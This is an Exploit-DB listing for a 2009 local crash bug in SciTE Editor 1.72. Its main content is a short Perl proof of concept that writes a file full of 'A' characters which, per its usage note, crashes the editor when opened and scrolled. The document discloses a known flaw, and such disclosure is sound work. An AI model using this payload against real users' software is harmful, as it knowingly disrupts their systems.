Lucene search

K
exploitdbProdigyEDB-ID:9133
HistoryJul 13, 2009 - 12:00 a.m.

ScITE Editor 1.72 - Local Crash

2009-07-1300:00:00
prodigy
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

#!/usr/bin/perl
#
#######################################################################
#
#                    ScITE Editor 1.72 crash vulnerability Exploit
#            
########################################################################
#
#		          Bug Founded by prodigy
#
########################################################################

# ###                                 PoC                           ### #

############################################################################################
my $owned="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open(myfile,'>>crash.rb');
print myfile $owned;
close(myfile);
############################################################################################

[!]Usage: when you created the file is open with SciTE, and move the scroll bars

############################################################################################

#Greetz: Greetz myself for find the bug, and all the people of undersecurity.net

##########################################################################################

# milw0rm.com [2009-07-13]

AI Score

7.4

Confidence

Low

Related for EDB-ID:9133